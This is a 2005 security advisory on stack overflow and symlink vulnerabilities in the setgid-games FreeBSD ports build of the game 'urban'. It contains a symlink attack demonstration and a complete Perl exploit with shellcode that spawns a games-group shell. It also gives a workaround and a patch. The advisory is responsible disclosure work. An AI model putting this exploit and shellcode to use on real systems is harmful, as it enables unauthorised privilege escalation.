Multiple vulnerabilities in FreeBSD 'urban'

September 4th, 2005

I. BACKGROUND

URBAN is a bloody, violent sidescrolling shoot-em-up in which you're a
renegade military cyborg fighting your way out of the military base
where you were created.

'urban' is maintained and distributed as a FreeBSD ports package, as well
as having its own developer and official tarball release. The FreeBSD
ports package is installed setgid games by default, to allow for global
score files.  Urban is vulnerable to several stack overflow and symlink
vulnerabilities, giving rise to the possibility of privilege escalation to
gid games.

[* urban's official release, available at <https://urban.bengburken.net>,
does *not* install urban with setgid games privileges by default, so only
the FreeBSD ports package is susceptable to the vulnerabilities later
outlined in this advisory *]

II. DESCRIPTION

Urban is vulnerable to a stack overflow when handling the $HOME
environmental variable.  Since urban is installed with setgid games
privileges, privilege escalation is possible.  The overflow occurs when
urban copies the contents of the user's $HOME environmental variable into
a fixed-length buffer without bounds checking (sprintf is used).

[ ... ]

sprintf(filename, "%s/.urban", getenv("HOME"));

[ ... ]

 sprintf(filename, "%s/.urban/savegame.dat", getenv("HOME"));

[ ... ]

Several other less likely stack overflows may occur, such as in the
copying of the $USER environmental variable in certain circumstances.

[ ... ]

if(getenv("USER") != NULL)
      strcpy(Name, getenv("USER"));

[ ... ]

Urban is also vulnerable to some less serious symlink bugs, due to the
following of symbolic links when creating certain high score and save game
files.

[ ... ]

           /* Create dir */
    sprintf(filename, "%s/.urban", getenv("HOME"));

[ ... ]

     mkdir(filename, S_IRUSR | S_IWUSR | S_IXUSR);

    sprintf(filename, "%s/.urban/savegame.dat", getenv("HOME"));

                 if((fs = fopen(filename, "wb")) == NULL)

[ ... ]

Since urban has the setgid games privileges, an attacker can craft an
appropriate symbolic link (i.e. ~/.urban/savegame.dat) which can lead to
creation and/or truncation of files with the privileges of gid games. 
This may allow attackers to edit global score files and possibly leverage
further attacks (i.e. exploit symlink bugs in games which require
write-access to /var/games to exploit).

It is worth noting once more that the official tarball of urban does *not*
install urban with setgid games privileges, but the FreeBSD ports version
does (/usr/ports/games/urban).



III. EXPLOITATION

The symbolic link bug outlined earlier can be exploited by creating a
suitable symbolic link in one's home directory, such as
~/.urban/savegame.dat.

bash-2.05b# ls -l /var/games/helloworld
ls: /var/games/helloworld: No such file or directory
bash-2.05b# ln -s /var/games/helloworld savegame.dat
bash-2.05b# ls -l
total 0
lrwxr-xr-x  1 root  wheel  21 Sep  4 16:17 savegame.dat ->
/var/games/helloworld
bash-2.05b# urban
[ output truncated ]
bash-2.05b# ls -l /var/games/helloworld
-rw-r--r--  1 root  games  0 Sep  4 16:17 /var/games/helloworld

It is possible to write to any file writable by group games.  Such may
allow editing of score files and the possibility of further privilege
escalation (i.e. exploitation of bugs which require access to score file
dirs).

The stack overflow in handling of the user's $HOME environmental variable
is exploitable as a vanilla buffer overflow.

su-2.05b$ export HOME=`perl -e 'print "a"x2000'`
su-2.05b$ gdb -q urban
(no debugging symbols found)...(gdb) r
Starting program: /usr/X11R6/bin/urban

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1 (LWP 100144)]
0x61616161 in ?? ()
(gdb)

Exploitation is straight forward.

I have written a simple exploit which yields a shell with egid (effective
group id) privileges.

-- urban.pl
#!/usr/bin/perl
# FreeBSD /usr/ports/games/urban local stack overflow exploit
# 'urban' is vulnerable to a stack overflow when handling
# the $HOME environmental variable, thus allowing privilege
# escalation to gid games since 'urban' is setgid 'games'.
# Shellcode and NOPs are placed inside an environmental variable
# ($HACK) and $HOME is crafted such that 'urban' will return into
# the code in $HACK.  The address of $HACK in the environment may
# need some investigating (i.e. using gdb).
#
# shaun@213$ id
# uid=1003(shaun) gid=1004(shaun) groups=1004(shaun)
# shaun@213$ perl urban.pl
# $ id
# uid=1003(shaun) gid=1004(shaun) egid=13(games) groups=13(games),
1004(shaun)
# $

$ret = 0xbfbfeece; #works on my FreeBSD 5.4-RELEASE system
$nop = "\x90";
$shellcode =
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02/bin/sh.-c.sh";

for($i = 0; $i < 100; $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'HACK'}) = $buffer;

$ret = pack("l", $ret);
local($ENV{'HOME'}) = "a"x1036 . $ret;
exec("urban");  # run vulnerable program
-- urban.pl

Also available at: <http://www.demodulated.net/exploits/urban.pl>

Below shows output of me running the exploit.

su-2.05b$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
su-2.05b$ perl urban.pl
$ id
uid=1002(shaun) gid=1002(shaun) egid=13(games) groups=13(games), 1002(shaun)



IV. DETECTION

The latest FreeBSD ports release of urban is vulnerable.

urban 1.5.3_1

Earlier versions are suspected vulnerable.

The latest official release of urban, 1.5.3, contains all the bugs
aforementioned, but does not install urban with setgid games privileges.


V. WORKAROUND

Remove setgid games privileges from the urban binary.

bash-2.05b# ls -l `which urban`
-r-xr-sr-x  1 root  games  340224 Sep  4 16:17 /usr/X11R6/bin/urban
bash-2.05b# chmod g-s `which urban`
bash-2.05b# ls -l `which urban`
-r-xr-xr-x  1 root  games  340224 Sep  4 16:17 /usr/X11R6/bin/urban

This will render global scoring unusable unless urban is run as root or
games user.


VI. SOLUTION

I submitted information and patches to the FreeBSD ports urban maintainer,
Jean-Yves Lefort, and he reports that the patches have been committed for
later release.  The unified patch file can be obtained from my webspace,
<http://www.demodulated.net/urban-overflows.patch>.

The patch fixes the overflows mentioned earlier, and several other
possible overflows.  Privileges are also dropped at the beginning of
execution and restored when needed.



Thanks to Jean-Yves Lefort for cooperation.


Thank you for your time,
Shaun.